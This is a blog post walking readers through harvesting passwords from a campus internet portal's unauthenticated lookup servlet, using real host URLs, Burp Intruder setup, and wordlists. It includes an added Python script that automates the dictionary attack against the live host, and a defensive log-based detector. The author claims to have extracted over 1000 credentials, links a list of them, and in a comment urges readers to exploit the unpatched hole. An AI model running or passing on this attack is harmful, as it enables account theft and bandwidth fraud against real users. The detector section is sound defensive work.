Tuesday, May 24, 2016

How I managed to hack into I-ON


(I'm not a computer expert, nor am I from the CS branch; I know how computers work and have a little bit of common sense, so please don't expect a detailed report in this post. If you need help, feel free to mail me.)


I don't want to brag about how I figured this out and all that, so let me get to the point.

Step: 1
Check the source of the I-ON login page at http://172.16.16.16/24online/webpages/client.jsp
Just press "ctrl+u".

Step: 2
Search for "fetch" by pressing "ctrl+f". It lands you in the page script that calls the AjaxManager servlet, which is where the URL in the next step comes from.

Step: 3
Now copy the URL "http://1.186.15.77/24online/servlet/AjaxManager?mode=2000&nasip=1.186.23.37&password=" and paste it into your address bar.

Step: 4
You can append any password of your choice after "password=" in the URL, and the response contains the registration number of the account that password belongs to. In other words, the servlet is an unauthenticated reverse lookup: it takes only a password, no username, and answers with the owner, so every guess is checked against every account at once rather than against one login.
example:

Let's use a random word, "crab".

If you just want one account, you can keep trying until you find what you are looking for; 40 GB is great for such little work.
I have extracted more than 1000 usernames and passwords, maybe more, which is more than 40 TB of bandwidth per month. Well, not all of them work; most are old accounts. With enough patience this method will crack even the toughest password, since nothing stops you from guessing.

Step: 5
Download and install Burp Suite.
I used to use this tool for modifying requests and finding coupon codes on red bus; for our job Burp Suite works like a charm.
After installation, open Burp Suite.

By default a proxy listener is opened at "127.0.0.1:8080".

Step: 6
Set your browser proxy to "127.0.0.1:8080".
I'm using Mozilla Firefox.
You can change the proxy under Options > Advanced > Network > Connection > Settings > Manual proxy configuration.


Step: 7
Now make a request from the address bar as you did before:
"http://1.186.15.77/24online/servlet/AjaxManager?mode=2000&nasip=1.186.23.37&password=0000"
Now go back to Burp and open the Proxy tab; you should see a request like this.

Step: 8
Now press "ctrl+i" to send the request to Intruder, open the Intruder tab and go to its Positions tab.

Step: 9

Burp marks the value of every parameter as a payload position with § markers. Remove the markers around the mode and nasip values so that only the password value remains a position; your final text should look like this.

Step: 10
Get a payload list.
You can use any payload here: either brute-force all possible combinations, which will take hours to days to complete, or grab a list of all dictionary words from here.
Copy all the text with "ctrl+a" and "ctrl+c".
Now go to the Payloads tab and paste the list with the Paste button. Your tab should look like this now.

Switch to the Options tab and change the values as shown below. You can go higher than 127 threads if you have good bandwidth, but for some reason I was not able to go beyond this value.

Step: 11
Now open the Intruder menu and click "Start attack". You will see the response for every single password the suite tries. The hits stand out by their size: sort the results table by the Length column and the passwords that matched an account separate from the identical no-match responses. You can also export the results to a single file using the Save function. Here is my list.

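The same dictionary attack as a script, added here as an example; it is not code from the original post and not part of the 24online product. The request shape (mode=2000, nasip, password) and the two IP addresses come from the post. The page never shows what the servlet answers (the screenshots are lost), so the script uses the same trick an Intruder user does: it first requests a guess assumed to match no account and treats every response that differs from that baseline as a hit. The `fetch` parameter, the `FAKE_ACCOUNTS` table and the empty-body-means-no-match convention are assumptions made so the logic can be exercised offline.

```python
"""Scripted version of the dictionary attack the post runs through Burp Intruder."""
import sys
import urllib.parse
import urllib.request
from concurrent.futures import ThreadPoolExecutor

# Values taken from the post's own request.
ORACLE_URL = "http://1.186.15.77/24online/servlet/AjaxManager"
NAS_IP = "1.186.23.37"
# Assumption: a long random string matches no account, so its response is the
# "no match" baseline that every other response is compared against.
BASELINE_GUESS = "no-such-password-7f3c9e2a1b"


def build_url(password, base=ORACLE_URL, nasip=NAS_IP):
    """Build one lookup URL with the guess percent-encoded.

    The post pastes the word straight into the address bar, which silently
    breaks on guesses containing '&', '#', '%' or spaces; urlencode handles them.
    """
    query = urllib.parse.urlencode(
        {"mode": "2000", "nasip": nasip, "password": password}
    )
    return f"{base}?{query}"


def http_fetch(url, timeout=10):
    """Real transport: a single GET, body returned as text."""
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")


def find_hits(wordlist, fetch=http_fetch, workers=32):
    """Try every word against the oracle and return [(word, body)] for the
    responses that differ from the no-match baseline.

    `fetch` is injectable so the logic can run offline (see fake_fetch below).
    `workers` plays the role of the Intruder thread count. If the live server
    echoes the guess back in the body, compare lengths or strip the echoed
    value before the comparison instead of comparing whole bodies.
    """
    baseline = fetch(build_url(BASELINE_GUESS))

    def probe(word):
        return word, fetch(build_url(word))

    with ThreadPoolExecutor(max_workers=workers) as pool:
        return [(w, body) for w, body in pool.map(probe, wordlist) if body != baseline]


# Constructed stand-in for the server so the script can be exercised offline.
# The account table and the "empty body means no match" convention are made up;
# the page does not show the real response format.
FAKE_ACCOUNTS = {"crab": "150905123", "hunter2": "140911007"}


def fake_fetch(url):
    qs = urllib.parse.parse_qs(urllib.parse.urlsplit(url).query)
    guess = qs.get("password", [""])[0]
    return FAKE_ACCOUNTS.get(guess, "")


if __name__ == "__main__":
    # Usage: python oracle_attack.py wordlist.txt   (one guess per line)
    if len(sys.argv) != 2:
        sys.exit("usage: oracle_attack.py WORDLIST")
    with open(sys.argv[1], encoding="utf-8", errors="ignore") as fh:
        words = [line.strip() for line in fh if line.strip()]
    for word, body in find_hits(words):
        print(f"{word!r} -> {body.strip()}")
```

Running it with `fetch=fake_fetch` shows the shape of the result without touching the network; against the live host the baseline comparison is the part worth checking by hand first, because a server that varies its response (timestamps, session tokens) will make every guess look like a hit.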
This loophole has been around since I joined MIT back in 2013, and it is still there even after being reported multiple times. Have fun and happy hacking :)
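What the operator side of this looks like while the hole stays open, as an added example that is not part of the original post: a dictionary run like the one above leaves a burst of AjaxManager requests with many distinct password= values from one source address. The detector below parses Common Log Format access-log lines and flags any address that tried at least a threshold of distinct passwords inside one minute. The log format, the threshold and the sample lines are assumptions; the sample lines are constructed, not real traffic, and the servlet path is the one the post uses.

```python
"""Detecting the password-guessing pattern in web-server access logs."""
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import parse_qs, urlsplit

# Common Log Format; assumption: the portal's web server logs in this format.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d+) (?P<size>\S+)'
)
ORACLE_PATH = "/24online/servlet/AjaxManager"   # servlet path from the post


def parse_line(line):
    """Return {ip, ts, method, path, status, size} or None if the line does not parse."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def oracle_guess(path):
    """If `path` is a mode=2000 AjaxManager call, return the password value tried."""
    parts = urlsplit(path)
    if parts.path != ORACLE_PATH:
        return None
    qs = parse_qs(parts.query, keep_blank_values=True)
    if qs.get("mode", [""])[0] != "2000":
        return None
    return qs.get("password", [None])[0]


def detect_guessing(lines, threshold=20):
    """Flag sources that tried >= `threshold` distinct passwords within one minute.

    Returns {ip: max distinct guesses seen in any single minute} for flagged IPs.
    Distinct values are what matter: a user retyping the same wrong password
    ten times is not an attack; ten different values from one address is.
    """
    per_minute = defaultdict(set)          # (ip, minute) -> set of guesses
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        guess = oracle_guess(rec["path"])
        if guess is None:
            continue
        minute = rec["ts"].replace(second=0, microsecond=0)
        per_minute[(rec["ip"], minute)].add(guess)
    worst = {}
    for (ip, _), guesses in per_minute.items():
        worst[ip] = max(worst.get(ip, 0), len(guesses))
    return {ip: n for ip, n in worst.items() if n >= threshold}


def build_sample_log():
    """Constructed log lines (not real traffic): one user making two attempts
    plus a page load, and one source sending 25 distinct guesses in one minute."""
    fmt = ('{ip} - - [24/May/2016:10:{mm:02d}:{ss:02d} +0530] '
           '"GET /24online/servlet/AjaxManager?mode=2000&nasip=1.186.23.37'
           '&password={pw} HTTP/1.1" 200 {size}')
    lines = [
        fmt.format(ip="10.0.0.5", mm=0, ss=1, pw="wrongpass", size=0),
        fmt.format(ip="10.0.0.5", mm=0, ss=9, pw="rightpass", size=9),
        '10.0.0.5 - - [24/May/2016:10:00:10 +0530] '
        '"GET /24online/webpages/client.jsp HTTP/1.1" 200 4310',
    ]
    lines += [fmt.format(ip="10.0.0.77", mm=1, ss=2 * i, pw=f"word{i}", size=0)
              for i in range(25)]
    return lines


if __name__ == "__main__":
    for ip, n in detect_guessing(build_sample_log()).items():
        print(f"{ip}: {n} distinct password guesses in one minute")
```

On a campus network many users sit behind one NAT address, so the per-IP threshold needs tuning against normal traffic before it is used for blocking. Detection only buys time: the fix belongs in the servlet, which should take username and password together, answer only success or failure, and throttle repeated failures instead of serving as a lookup table.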


If you are too lazy to do any of this, here is a link to a few passwords that I managed to extract.
-YOLO


5 comments:

  1. lol..... do these IDs work?

  2. Some of them still do, but the whole point here is the exploit. It's still not patched, so make use of it; you can then dig up your own set of IDs and passwords.